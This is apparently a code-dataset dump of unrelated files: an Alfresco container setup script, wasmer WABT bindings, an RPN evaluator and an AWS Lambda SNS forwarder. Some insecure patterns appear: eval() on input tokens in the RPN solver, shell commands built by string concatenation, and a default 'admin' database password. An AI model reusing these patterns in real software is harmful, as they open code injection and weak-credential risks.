self.replace_all(ALFRESCO_PATH + '/tomcat/shared/classes/alfresco-global.properties', '^#.mail.host\s*=', '#mail.host=')
self.replace_all(ALFRESCO_PATH + '/tomcat/shared/classes/alfresco-global.properties', '^#.mail.port\s*=', '#mail.port=')
self.replace_all(ALFRESCO_PATH + '/tomcat/shared/classes/alfresco-global.properties', '^#.mail.protocol\s*=', '#mail.protocol=')
self.replace_all(ALFRESCO_PATH + '/tomcat/shared/classes/alfresco-global.properties', '^#.mail.from.default\s*=', 'mail.from.default=')
if user is not None and user != "":
if password is None or password == "":
raise KeyError("You must provide password")
self.replace_all(ALFRESCO_PATH + '/tomcat/shared/classes/alfresco-global.properties', '^#.mail.username\s*=.*', 'mail.username=' + user)
self.replace_all(ALFRESCO_PATH + '/tomcat/shared/classes/alfresco-global.properties', '^#.mail.password\s*=.*', 'mail.password=' + password)
if protocol == "smtp":
self.replace_all(ALFRESCO_PATH + '/tomcat/shared/classes/alfresco-global.properties', '^#.mail.smtp.auth\s*=.*', 'mail.smtp.auth=false')
if starttls_enable == "true":
self.replace_all(ALFRESCO_PATH + '/tomcat/shared/classes/alfresco-global.properties', '^#.mail.smtp.starttls.enable\s*=.*', 'mail.smtp.starttls.enable=true')
else:
self.replace_all(ALFRESCO_PATH + '/tomcat/shared/classes/alfresco-global.properties', '^#.mail.smtp.starttls.enable\s*=', '#mail.smtp.starttls.enable=')
elif protocol == "smtps":
self.replace_all(ALFRESCO_PATH + '/tomcat/shared/classes/alfresco-global.properties', '^#.mail.smtps.auth\s*=.*', 'mail.smtps.auth=false')
if starttls_enable == "true":
self.replace_all(ALFRESCO_PATH + '/tomcat/shared/classes/alfresco-global.properties', '^#.mail.smtps.starttls.enable\s*=.*', 'mail.smtps.starttls.enable=true')
else:
self.replace_all(ALFRESCO_PATH + '/tomcat/shared/classes/alfresco-global.properties', '^#.mail.smtps.starttls.enable\s*=', '#mail.smtps.starttls.enable=')
else:
self.replace_all(ALFRESCO_PATH + '/tomcat/shared/classes/alfresco-global.properties', '^#.mail.username\s*=', '#mail.username=')
self.replace_all(ALFRESCO_PATH + '/tomcat/shared/classes/alfresco-global.properties', '^#.mail.password\s*=', '#mail.password=')
self.replace_all(ALFRESCO_PATH + '/tomcat/shared/classes/alfresco-global.properties', '^#.mail.smtp.auth\s*=', '#mail.smtp.auth=')
self.replace_all(ALFRESCO_PATH + '/tomcat/shared/classes/alfresco-global.properties', '^#.mail.smtps.auth\s*=', '#mail.smtps.auth=')
self.replace_all(ALFRESCO_PATH + '/tomcat/shared/classes/alfresco-global.properties', '^#.mail.smtp.starttls.enable\s*=', '#mail.smtp.starttls.enable=')
self.replace_all(ALFRESCO_PATH + '/tomcat/shared/classes/alfresco-global.properties', '^#.mail.smtps.starttls.enable\s*=', '#mail.smtps.starttls.enable=')
def set_cifs(self, enable, server_name, domain):
global ALFRESCO_PATH
if self.skipSetupGlobal == True:
return
if enable == "true":
if server_name is None or server_name == "":
raise KeyError("You must provide the server name")
if domain is None or domain == "":
raise KeyError("You must provide the domain")
self.replace_all(ALFRESCO_PATH + '/tomcat/shared/classes/alfresco-global.properties', '^#.cifs.enabled\s*=.*', 'cifs.enabled=true')
self.replace_all(ALFRESCO_PATH + '/tomcat/shared/classes/alfresco-global.properties', '^#.cifs.Server.Name\s*=.*', 'cifs.Server.Name=' + server_name)
self.replace_all(ALFRESCO_PATH + '/tomcat/shared/classes/alfresco-global.properties', '^#.cifs.domain\s*=.*', 'cifs.domain=' + domain)
self.replace_all(ALFRESCO_PATH + '/tomcat/shared/classes/alfresco-global.properties', '^#.cifs.hostannounce\s*=.*', 'cifs.hostannounce=true')
self.replace_all(ALFRESCO_PATH + '/tomcat/shared/classes/alfresco-global.properties', '^#.cifs.broadcast\s*=.*', 'cifs.broadcast=0.0.0.255')
self.replace_all(ALFRESCO_PATH + '/tomcat/shared/classes/alfresco-global.properties', '^#.cifs.ipv6.enabled\s*=.*', 'cifs.ipv6.enabled=false')
else:
self.replace_all(ALFRESCO_PATH + '/tomcat/shared/classes/alfresco-global.properties', '^#.cifs.enabled\s*=', '#cifs.enabled=')
self.replace_all(ALFRESCO_PATH + '/tomcat/shared/classes/alfresco-global.properties', '^#.cifs.Server.Name\s*=', '#cifs.Server.Name=')
self.replace_all(ALFRESCO_PATH + '/tomcat/shared/classes/alfresco-global.properties', '^#.cifs.domain\s*=', '#cifs.domain=')
self.replace_all(ALFRESCO_PATH + '/tomcat/shared/classes/alfresco-global.properties', '^#.cifs.hostannounce\s*=', '#cifs.hostannounce=')
self.replace_all(ALFRESCO_PATH + '/tomcat/shared/classes/alfresco-global.properties', '^#.cifs.broadcast\s*=', '#cifs.broadcast=')
self.replace_all(ALFRESCO_PATH + '/tomcat/shared/classes/alfresco-global.properties', '^#.cifs.ipv6.enabled\s*=', '#cifs.ipv6.enabled=')
def set_ldap(self, enable, auth_format, host, user, password, list_admins, search_base_group, search_base_user):
global ALFRESCO_PATH
if self.skipSetupLdap == True:
return
if enable == "true":
if auth_format is None or auth_format == "":
raise KeyError("You must provide auth_format")
if host is None or host == "":
raise KeyError("You must provide host")
if user is None or user == "":
raise KeyError("You must provide user")
if password is None or password == "":
raise KeyError("You must provide password")
if list_admins is None or list_admins == "":
raise KeyError("You must provide list admins")
if search_base_group is None or search_base_group == "":
raise KeyError("You must provide the search base group")
if search_base_user is None or search_base_user == "":
raise KeyError("You must provide the search base user")
self.replace_all(ALFRESCO_PATH + '/tomcat/shared/classes/alfresco-global.properties', 'authentication.chain\s*=.*', 'authentication.chain=alfrescoNtlm1:alfrescoNtlm,ldap1:ldap')
self.replace_all(ALFRESCO_PATH + '/tomcat/shared/classes/alfresco/extension/subsystems/Authentication/ldap/ldap1/ldap-authentication.properties', 'ldap.authentication.userNameFormat\s*=.*', 'ldap.authentication.userNameFormat=' + auth_format)
self.replace_all(ALFRESCO_PATH + '/tomcat/shared/classes/alfresco/extension/subsystems/Authentication/ldap/ldap1/ldap-authentication.properties', 'ldap.authentication.java.naming.provider.url\s*=.*', 'ldap.authentication.java.naming.provider.url=ldap://' + host + ':389')
self.replace_all(ALFRESCO_PATH + '/tomcat/shared/classes/alfresco/extension/subsystems/Authentication/ldap/ldap1/ldap-authentication.properties', 'ldap.authentication.defaultAdministratorUserNames\s*=.*', 'ldap.authentication.defaultAdministratorUserNames=' + list_admins)
self.replace_all(ALFRESCO_PATH + '/tomcat/shared/classes/alfresco/extension/subsystems/Authentication/ldap/ldap1/ldap-authentication.properties', 'ldap.synchronization.java.naming.security.principal\s*=.*', 'ldap.synchronization.java.naming.security.principal=' + user)
self.replace_all(ALFRESCO_PATH + '/tomcat/shared/classes/alfresco/extension/subsystems/Authentication/ldap/ldap1/ldap-authentication.properties', 'ldap.synchronization.java.naming.security.credentials\s*=.*', 'ldap.synchronization.java.naming.security.credentials=' + password)
self.replace_all(ALFRESCO_PATH + '/tomcat/shared/classes/alfresco/extension/subsystems/Authentication/ldap/ldap1/ldap-authentication.properties', 'ldap.synchronization.groupSearchBase\s*=.*', 'ldap.synchronization.groupSearchBase=' + search_base_group)
self.replace_all(ALFRESCO_PATH + '/tomcat/shared/classes/alfresco/extension/subsystems/Authentication/ldap/ldap1/ldap-authentication.properties', 'ldap.synchronization.userSearchBase\s*=.*', 'ldap.synchronization.userSearchBase=' + search_base_user)
else:
self.replace_all(ALFRESCO_PATH + '/tomcat/shared/classes/alfresco-global.properties', 'authentication.chain\s*=.*', 'authentication.chain=alfrescoNtlm1:alfrescoNtlm')
def init_data_folder(self):
global ALFRESCO_PATH
if len(os.listdir(ALFRESCO_PATH + '/alf_data')) < 5:
os.system('mv ' + ALFRESCO_PATH + '/alf_data_org/* ' + ALFRESCO_PATH + '/alf_data/')
os.system('chown -R alfresco:alfresco ' + ALFRESCO_PATH + '/alf_data')
def set_reverse_proxy(self, url):
global ALFRESCO_PATH
if url is None or url == "":
raise KeyError("You must provide url")
csrf_policy = """
<config evaluator="string-compare" condition="CSRFPolicy" replace="true">
<!--
Will be used and exposed to the client-side code in Alfresco.constants.CSRF_POLICY.
Use the Alfresco.util.CSRFPolicy.getHeader() or Alfresco.util.CSRFPolicy.getParameter() with Alfresco.util.CSRFPolicy.getToken()
to set the token in custom 3rd party code.
-->
<client>
<cookie>Alfresco-CSRFToken</cookie>
<header>Alfresco-CSRFToken</header>
<parameter>Alfresco-CSRFToken</parameter>
</client>
<!-- The first rule with a matching request will get its action invoked, the remaining rules will be ignored. -->
<filter>
<!--
Certain Surf POST requests from the WebScript console must be allowed to pass without a token since
the Surf WebScript console code can't be dependent on a Share specific filter.
-->
<rule>
<request>
<method>POST</method>
<path>^\/page\/caches\/dependency\/clear|^\/page\/index|^\/page\/surfBugStatus|^\/page\/modules\/deploy|^\/page\/modules\/module|^\/page\/api\/javascript\/debugger</path>
</request>
<action name="assertReferer">
<param name="always">false</param>
<param name="referer">""" + url + """/.*</param>
</action>
<action name="assertOrigin">
<param name="always">false</param>
<param name="origin">""" + url + """</param>
</action>
</rule>
<!-- Certain Share POST requests does NOT require a token -->
<rule>
<request>
<method>POST</method>
<path>^/page/dologin.*|^\/page/site\/[^\/]+\/start-workflow|^\/page/start-workflow</path>
</request>
<action name="assertReferer">
<param name="always">false</param>
<param name="referer">""" + url + """/.*</param>
</action>
<action name="assertOrigin">
<param name="always">false</param>
<param name="origin">""" + url + """</param>
</action>
</rule>
<!-- Clear the token when logging out -->
<rule>
<request>
<method>GET</method>
<path>^/page/dologout.*</path>
</request>
<action name="clearToken">
<param name="session">Alfresco-CSRFToken</param>
<param name="cookie">Alfresco-CSRFToken</param>
</action>
</rule>
<!-- Make sure the first token is generated -->
<rule>
<request>
<session>
<attribute name="_alf_USER_ID">.*</attribute>
<attribute name="Alfresco-CSRFToken"/>
<!-- empty attribute element indicates null -->
</session>
</request>
<action name="generateToken">
<param name="session">Alfresco-CSRFToken</param>
<param name="cookie">Alfresco-CSRFToken</param>
</action>
</rule>
<!-- Refresh token on new "page" visit when a user is logged in -->
<rule>
<request>
<method>GET</method>
<path>^/page/.*</path>
<session>
<attribute name="_alf_USER_ID">.*</attribute>
<attribute name="Alfresco-CSRFToken">.*</attribute>
</session>
</request>
<action name="generateToken">
<param name="session">Alfresco-CSRFToken</param>
<param name="cookie">Alfresco-CSRFToken</param>
</action>
</rule>
<!-- Verify multipart requests contains the token as a parameter and also correct referer & origin header if available -->
<rule>
<request>
<method>POST</method>
<header name="Content-Type">^multipart/.*</header>
<session>
<attribute name="_alf_USER_ID">.*</attribute>
</session>
</request>
<action name="assertToken">
<param name="session">Alfresco-CSRFToken</param>
<param name="parameter">Alfresco-CSRFToken</param>
</action>
<action name="assertReferer">
<param name="always">false</param>
<param name="referer">""" + url + """/.*</param>
</action>
<action name="assertOrigin">
<param name="always">false</param>
<param name="origin">""" + url + """</param>
</action>
</rule>
<!--
Verify there is a token in the header for remaining state changing requests and also correct
referer & origin headers if available. We "catch" all content types since just setting it to
"application/json.*" since a webscript that doesn't require a json request body otherwise would be
successfully executed using i.e. "text/plain".
-->
<rule>
<request>
<method>POST|PUT|DELETE</method>
<session>
<attribute name="_alf_USER_ID">.*</attribute>
</session>
</request>
<action name="assertToken">
<param name="session">Alfresco-CSRFToken</param>
<param name="header">Alfresco-CSRFToken</param>
</action>
<action name="assertReferer">
<param name="always">false</param>
<param name="referer">""" + url + """/.*</param>
</action>
<action name="assertOrigin">
<param name="always">false</param>
<param name="origin">""" + url + """</param>
</action>
</rule>
</filter>
</config>
"""
self.replace_all(ALFRESCO_PATH + '/tomcat/shared/classes/alfresco/web-extension/share-config-custom.xml', '<\/alfresco-config>', csrf_policy + "\n</alfresco-config>")
def set_vti_setting(self, host, port):
if self.skipSetupGlobal == True:
return
if host is not None and host != "" and port is not None and port > 0:
self.replace_all(ALFRESCO_PATH + '/tomcat/shared/classes/alfresco-global.properties', '^#.vti.server.port\s*=.*', 'vti.server.port=7070')
self.replace_all(ALFRESCO_PATH + '/tomcat/shared/classes/alfresco-global.properties', '^#.vti.server.external.host\s*=.*', 'vti.server.external.host=' + host)
self.replace_all(ALFRESCO_PATH + '/tomcat/shared/classes/alfresco-global.properties', '^#.vti.server.external.port\s*=.*', 'vti.server.external.port=' + port)
else:
self.replace_all(ALFRESCO_PATH + '/tomcat/shared/classes/alfresco-global.properties', '^#.vti.server.port\s*=.*', '#vti.server.port=')
self.replace_all(ALFRESCO_PATH + '/tomcat/shared/classes/alfresco-global.properties', '^#.vti.server.external.host\s*=.*', '#vti.server.external.host=')
self.replace_all(ALFRESCO_PATH + '/tomcat/shared/classes/alfresco-global.properties', '^#.vti.server.external.port\s*=.*', '#vti.server.external.port=')
def disable_log_rotation(self):
valve_setting = 'prefix="localhost_access_log" suffix=".log" pattern="combined" rotatable="false"'
self.replace_all(ALFRESCO_PATH + '/tomcat/conf/server.xml', 'prefix="localhost_access_log" suffix=".txt"', valve_setting)
self.replace_all(ALFRESCO_PATH + '/tomcat/conf/server.xml', re.escape('pattern="%h %l %u %t "%r" %s %b"'), '')
logging_setting = """
1catalina.org.apache.juli.FileHandler.rotatable = false
2localhost.org.apache.juli.FileHandler.rotatable = false
3manager.org.apache.juli.FileHandler.rotatable = false
4host-manager.org.apache.juli.FileHandler.rotatable = false
1catalina.org.apache.juli.FileHandler.suffix = log
2localhost.org.apache.juli.FileHandler.suffix = log
3manager.org.apache.juli.FileHandler.suffix = log
4host-manager.org.apache.juli.FileHandler.suffix = log
"""
self.add_end_file(ALFRESCO_PATH + '/tomcat/conf/logging.properties', logging_setting)
def replace_all(self, file, searchRegex, replaceExp, is_create = True):
""" Replace String in file with regex
:param file: The file name where you should to modify the string
:param searchRegex: The pattern which must match to replace the string
:param replaceExp: The string replacement
:return:
"""
is_found = False
regex = re.compile(searchRegex, re.IGNORECASE)
f = open(file,'r')
out = f.readlines()
f.close()
f = open(file,'w')
for line in out:
if regex.search(line) is not None:
line = regex.sub(replaceExp, line)
is_found = True
f.write(line)
f.close()
if is_create is True and is_found is False:
self.add_end_file(file, replaceExp)
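# For example (illustrative call):
# replace_all(path, r'ftp.port\s*=.*', 'ftp.port=21')
# rewrites a matching line in place, or appends 'ftp.port=21' to the file
# when nothing matched and is_create is True.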
def add_end_file(self, file, line):
""" Add line at the end of file
:param file: The file where you should to add line to the end
:param line: The line to add in file
:return:
"""
with open(file, "a") as myFile:
myFile.write("\n" + line + "\n")
if __name__ == '__main__':
if os.path.isfile(ALFRESCO_PATH + '/init_done'):
print('echo ==================== find init_done, skip!')
exit(0)
else:
os.system('touch ' + ALFRESCO_PATH + '/init_done')
serviceRun = ServiceRun()
# We init alfresco config
if os.path.isfile(ALFRESCO_GLOBAL_BAK):
serviceRun.skipSetupGlobal = True
print('echo ========== copy global bak')
os.system('cp ' + ALFRESCO_GLOBAL_BAK + ' ' + ALFRESCO_PATH + '/tomcat/shared/classes/alfresco-global.properties')
else:
os.system('cp ' + ALFRESCO_PATH + '/tomcat/shared/classes/alfresco-global.properties.org ' + ALFRESCO_PATH + '/tomcat/shared/classes/alfresco-global.properties')
if os.path.isfile(ALFRESCO_LDAP_BAK):
serviceRun.skipSetupLdap = True
print('echo ========== copy ldap bak')
os.system('cp ' + ALFRESCO_LDAP_BAK + ' ' + ALFRESCO_PATH + '/tomcat/shared/classes/alfresco/extension/subsystems/Authentication/ldap/ldap1/ldap-authentication.properties')
# We init share-config
os.system('cp ' + ALFRESCO_PATH + '/tomcat/shared/classes/alfresco/web-extension/share-config-custom.xml.org ' + ALFRESCO_PATH + '/tomcat/shared/classes/alfresco/web-extension/share-config-custom.xml')
# We init tomcat setting
os.system('cp ' + ALFRESCO_PATH + '/tomcat/conf/server.xml.org ' + ALFRESCO_PATH + '/tomcat/conf/server.xml')
os.system('cp ' + ALFRESCO_PATH + '/tomcat/conf/logging.properties.org ' + ALFRESCO_PATH + '/tomcat/conf/logging.properties')
# We init data folder
serviceRun.init_data_folder()
# We remove log rotation to manage them with logrotate
serviceRun.disable_log_rotation()
# We set database
# We check if official Postgresql container is linked as DB
if os.getenv('DB_ENV_POSTGRES_DB') is not None:
serviceRun.set_database_connection('postgresql', 'db', '5432', os.getenv('DB_ENV_POSTGRES_DB'), os.getenv('DB_ENV_POSTGRES_USER'), os.getenv('DB_ENV_POSTGRES_PASSWORD'))
elif os.getenv('DB_ENV_MYSQL_DATABASE') is not None:
serviceRun.set_database_connection('mysql', 'db', '3306', os.getenv('DB_ENV_MYSQL_DATABASE'), os.getenv('DB_ENV_MYSQL_USER'), os.getenv('DB_ENV_MYSQL_PASSWORD'))
else:
serviceRun.set_database_connection(os.getenv('DATABASE_TYPE', 'postgresql'), os.getenv('DATABASE_HOST', 'localhost'), os.getenv('DATABASE_PORT', '5432'), os.getenv('DATABASE_NAME', 'alfresco'), os.getenv('DATABASE_USER', 'alfresco'), os.getenv('DATABASE_PASSWORD', 'admin'))
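# Illustrative standalone environment (names match the os.getenv calls above;
# the values shown are this script's own defaults):
# DATABASE_TYPE=postgresql DATABASE_HOST=localhost DATABASE_PORT=5432
# DATABASE_NAME=alfresco DATABASE_USER=alfresco DATABASE_PASSWORD=admin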
# We set alfresco url
serviceRun.set_alfresco_context(os.getenv('ALFRESCO_HOSTNAME', '127.0.0.1'), os.getenv('ALFRESCO_PORT', '8080'), os.getenv('ALFRESCO_PROTOCOL', 'http'))
# We set share url
serviceRun.set_share_context(os.getenv('SHARE_HOSTNAME', '127.0.0.1'), os.getenv('SHARE_PORT', '8080'), os.getenv('SHARE_PROTOCOL', 'http'))
# We set ftp
serviceRun.set_ftp(os.getenv('FTP_ENABLED', 'true'), os.getenv('FTP_PORT', '21'))
# We set environment
serviceRun.set_core(os.getenv('ENVIRONMENT', 'PRODUCTION'))
# We set mail
serviceRun.set_mail(os.getenv('MAIL_HOST', 'localhost'), os.getenv('MAIL_PORT', '25'), os.getenv('MAIL_USER'), os.getenv('MAIL_PASSWORD'), os.getenv('MAIL_PROTOCOL', 'smtp'), os.getenv('MAIL_STARTTLS_ENABLE', 'false'), os.getenv('MAIL_SENDER', 'alfresco@alfresco.org'))
# We set CIFS
serviceRun.set_cifs(os.getenv('CIFS_ENABLED', 'true'), os.getenv('CIFS_SERVER_NAME', 'localhost'), os.getenv('CIFS_DOMAIN', 'WORKGROUP'))
# We set LDAP
serviceRun.set_ldap(os.getenv('LDAP_ENABLED', 'false'), os.getenv('LDAP_AUTH_FORMAT'), os.getenv('LDAP_HOST'), os.getenv('LDAP_USER'), os.getenv('LDAP_PASSWORD'), os.getenv('LDAP_ADMINS'), os.getenv('LDAP_GROUP_SEARCHBASE'), os.getenv('LDAP_USER_SEARCHBASE'))
# Reverse Proxy
if os.getenv('REVERSE_PROXY_URL') is not None:
serviceRun.set_reverse_proxy(os.getenv('REVERSE_PROXY_URL'))
# We set vti
serviceRun.set_vti_setting(os.getenv('VTI_HOST'), os.getenv('VTI_PORT'))
| 52.854578 | 287 | 0.646909 | 3,490 | 29,440 | 5.334384 | 0.109456 | 0.063168 | 0.076382 | 0.092818 | 0.666917 | 0.62921 | 0.569694 | 0.551002 | 0.539937 | 0.520277 | 0 | 0.003742 | 0.201189 | 29,440 | 556 | 288 | 52.94964 | 0.787898 | 0.024321 | 0 | 0.41866 | 0 | 0.033493 | 0.572949 | 0.314862 | 0 | 0 | 0 | 0 | 0.023923 | 1 | 0.033493 | false | 0.045455 | 0.014354 | 0 | 0.076555 | 0.007177 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
b2e16e474f5899171e6ce2d20a4edacc0bd469b0 | 2,343 | py | Python | embeddings/py/input.py | wapm-modules/wabt | 100bbbe6ef3ab968007460dfb3821122a4d2e828 | [
"Apache-2.0"
] | 3 | 2019-04-24T04:19:52.000Z | 2022-01-11T12:06:54.000Z | embeddings/py/input.py | wapm-modules/wabt | 100bbbe6ef3ab968007460dfb3821122a4d2e828 | [
"Apache-2.0"
] | null | null | null | embeddings/py/input.py | wapm-modules/wabt | 100bbbe6ef3ab968007460dfb3821122a4d2e828 | [
"Apache-2.0"
] | 1 | 2022-02-17T01:09:19.000Z | 2022-02-17T01:09:19.000Z | from wasmer import Store, Module, Instance
from intrinsics import encode_utf8, decode_utf8
from enum import IntFlag
class WasmFeature(IntFlag):
Exceptions=1
MutableGlobals=2
SatFloatToInt=4
SignExtension=8
SIMD=16
Threads=32
MultiValue=64
TailCall=128
BulkMemory=256
ReferenceTypes=512
Annotations=1024
GC=2048
Phase5=1|2|4|8|16|BulkMemory|ReferenceTypes
Phase4=Phase5
Phase3=Phase4|MultiValue|TailCall|Annotations
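# Being an IntFlag, features combine with bitwise OR, e.g. (illustrative):
# flags = WasmFeature.SIMD | WasmFeature.BulkMemory  # == 16 | 256 == 272
# The combined value is what the wasm2wat/wat2wasm methods below take as `flags`.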
class WABT:
def instantiate(self, module, imports):
self.instance = Instance(module, imports)
def wasm2wat(self, wasm, flags):
memory = self.instance.exports.memory
realloc = self.instance.exports.canonical_abi_realloc
free = self.instance.exports.canonical_abi_free
val0 = wasm
len0 = len(val0)
ptr0 = realloc(0, 0, 1, len0 * 1)
buffer = memory.int8_view()
buffer[ptr0:ptr0+len0*1] = val0
ret = self.instance.exports.wasm2wat(ptr0, len0, flags)
ret = int(ret / 4)
buf32 = memory.int32_view()
if buf32[ret] == 0:
ptr1 = buf32[ret + 2]
len1 = buf32[ret + 4]
list1 = decode_utf8(memory, ptr1, len1)
free(ptr1, len1, 1)
return list1
elif buf32[ret] == 1:
ptr2 = buf32[ret + 2]
len2 = buf32[ret + 4]
list2 = decode_utf8(memory, ptr2, len2)
free(ptr2, len2, 1)
raise Exception(list2)
def wat2wasm(self, wat, flags):
memory = self.instance.exports.memory
realloc = self.instance.exports.canonical_abi_realloc
free = self.instance.exports.canonical_abi_free
ptr0, len0 = encode_utf8(wat, realloc, memory)
ret = self.instance.exports.wat2wasm(ptr0, len0, flags)
ret = int(ret / 4)
buf32 = memory.int32_view()
if buf32[ret] == 0:
ptr1 = buf32[ret + 2]
len1 = buf32[ret + 4]
buf8 = memory.int8_view()
wasm = bytearray(buf8[ptr1:ptr1+len1])
free(ptr1, len1, 1)
return wasm
elif buf32[ret] == 1:
ptr2 = buf32[ret + 2]
len2 = buf32[ret + 4]
message = decode_utf8(memory, ptr2, len2)
free(ptr2, len2, 1)
raise Exception(message)
| 32.09589 | 63 | 0.589415 | 282 | 2,343 | 4.833333 | 0.294326 | 0.070433 | 0.111519 | 0.082172 | 0.46515 | 0.46515 | 0.46515 | 0.425532 | 0.425532 | 0.425532 | 0 | 0.093614 | 0.311566 | 2,343 | 72 | 64 | 32.541667 | 0.751395 | 0 | 0 | 0.38806 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.044776 | false | 0 | 0.074627 | 0 | 0.402985 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
b2e1d763ca1d8682a94fdcd4b91fe4866361614f | 2,017 | py | Python | data_structure/stack_and_queue/150. Evaluate Reverse Polish Notation.py | JunzhongLin/leetcode_practice | 47b2f5cc3c87de004ae21a94024e751b40b8f559 | [
"MIT"
] | null | null | null | data_structure/stack_and_queue/150. Evaluate Reverse Polish Notation.py | JunzhongLin/leetcode_practice | 47b2f5cc3c87de004ae21a94024e751b40b8f559 | [
"MIT"
] | null | null | null | data_structure/stack_and_queue/150. Evaluate Reverse Polish Notation.py | JunzhongLin/leetcode_practice | 47b2f5cc3c87de004ae21a94024e751b40b8f559 | [
"MIT"
] | null | null | null | '''
Evaluate the value of an arithmetic expression in Reverse Polish Notation.
Valid operators are +, -, *, and /. Each operand may be an integer or another expression.
Note that division between two integers should truncate toward zero.
It is guaranteed that the given RPN expression is always valid. That means the expression would always evaluate to a result, and there will not be any division by zero operation.
Example 1:
Input: tokens = ["2","1","+","3","*"]
Output: 9
Explanation: ((2 + 1) * 3) = 9
Example 2:
Input: tokens = ["4","13","5","/","+"]
Output: 6
Explanation: (4 + (13 / 5)) = 6
Example 3:
Input: tokens = ["10","6","9","3","+","-11","*","/","*","17","+","5","+"]
Output: 22
Explanation: ((10 * (6 / ((9 + 3) * -11))) + 17) + 5
= ((10 * (6 / (12 * -11))) + 17) + 5
= ((10 * (6 / -132)) + 17) + 5
= ((10 * 0) + 17) + 5
= (0 + 17) + 5
= 17 + 5
= 22
'''
class Solution:
def evalRPN(self, tokens):
stack = []
for item in tokens:
if item not in {"+", "-", "*", "/"}:
stack.append(item)
else:
first_num, second_num = stack.pop(), stack.pop()
stack.append(
int(eval(f'{second_num} {item} {first_num}'))  # the first operand popped goes after the operator
)
return int(stack.pop())  # if the input is a single number it is still a string here, so cast to int
class SolutionNew:
def evalRPN(self, tokens) -> int:
if tokens == []:
return None
operator_dict = {
'+': lambda x, y: x + y,
'-': lambda x, y: y - x,
'*': lambda x, y: x * y,
'/': lambda x, y: int(y/x)
}
stack = [int(tokens[0])]
for token in tokens[1:]:
if token in operator_dict:
value = operator_dict[token](stack.pop(), stack.pop())
stack.append(value)
else:
stack.append(int(token))
print(stack)
return stack.pop()
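# Quick checks against the docstring examples (illustrative):
# Solution().evalRPN(["2","1","+","3","*"]) -> 9
# SolutionNew().evalRPN(["4","13","5","/","+"]) -> 6
# Both truncate division toward zero, so e.g. 6 / -132 evaluates to 0.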
example = ["10","6","9","3","+","-11","*","/","*","17","+","5","+"] | 26.539474 | 178 | 0.499256 | 256 | 2,017 | 3.90625 | 0.390625 | 0.024 | 0.02 | 0.015 | 0.131 | 0.12 | 0.066 | 0.036 | 0 | 0 | 0 | 0.063754 | 0.307883 | 2,017 | 76 | 179 | 26.539474 | 0.652579 | 0.449678 | 0 | 0.0625 | 0 | 0 | 0.050863 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.0625 | false | 0 | 0 | 0 | 0.21875 | 0.03125 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
b2e2b46fb8341d5afe3d208c2f568ad900e6e95e | 1,028 | py | Python | module-6/app/ProcessQuestionsStream/mysfitsProcessStream.py | dialectic4th/aws-modern-application-workshop | d99d8f57bb74535f3c7ee22777792197dedec9ef | [
"Apache-2.0"
] | 17 | 2019-11-05T05:30:16.000Z | 2021-11-25T01:20:16.000Z | module-6/app/ProcessQuestionsStream/mysfitsProcessStream.py | jtwray/serverlessAWS-react | c8062a4dd740559976b5c524b8c2cba742b7781a | [
"Apache-2.0"
] | 1 | 2021-05-06T20:05:14.000Z | 2021-05-06T20:05:14.000Z | module-6/app/ProcessQuestionsStream/mysfitsProcessStream.py | jtwray/serverlessAWS-react | c8062a4dd740559976b5c524b8c2cba742b7781a | [
"Apache-2.0"
] | 26 | 2019-07-10T16:29:40.000Z | 2020-09-13T19:35:42.000Z | import boto3
import json
import os
# UNCOMMENT_BEFORE_2ND_DEPLOYMENT
#from aws_xray_sdk.core import xray_recorder
# UNCOMMENT_BEFORE_2ND_DEPLOYMENT
#from aws_xray_sdk.core import patch_all
# UNCOMMENT_BEFORE_2ND_DEPLOYMENT
#patch_all()
snsTopic = os.environ['SNS_TOPIC_ARN']
sns = boto3.client('sns')
def processStream(event, context):
emailSubject = "New Customer Question: "
emailMessage = "USER EMAIL: "
print("Received event: " + json.dumps(event))
for record in event['Records']:
item = record.get('dynamodb').get('NewImage')
questionText = item.get('QuestionText').get('S')
userEmail = item.get('UserEmailAddress').get('S')
emailSubject = emailSubject + userEmail
emailMessage = emailMessage + userEmail + ". QUESTION TEXT: " + questionText
sns.publish(
TopicArn=snsTopic,
Message=emailMessage,
Subject=emailSubject
)
return 'Successfully processed {} records.'.format(len(event['Records']))
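# Sketch of the DynamoDB stream record shape this handler expects
# (field values are illustrative):
# {"Records": [{"dynamodb": {"NewImage": {
#     "QuestionText": {"S": "How do I adopt a mysfit?"},
#     "UserEmailAddress": {"S": "user@example.com"}}}}]}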
| 24.47619 | 84 | 0.679961 | 111 | 1,028 | 6.135135 | 0.522523 | 0.066079 | 0.079295 | 0.123348 | 0.152717 | 0.152717 | 0.152717 | 0.152717 | 0.152717 | 0.152717 | 0 | 0.006158 | 0.210117 | 1,028 | 41 | 85 | 25.073171 | 0.832512 | 0.182879 | 0 | 0 | 0 | 0 | 0.213685 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.047619 | false | 0 | 0.142857 | 0 | 0.238095 | 0.047619 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
b2e3a79d5f9046cbb00a8f593c0ba35e44ea0538 | 11,890 | py | Python | MuonAnalysis/MomentumScaleCalibration/test/tree_production/miniAODVBTFMuonsOnlyTreeMC_CRAB_cfg.py | SWuchterl/cmssw | 769b4a7ef81796579af7d626da6039dfa0347b8e | [
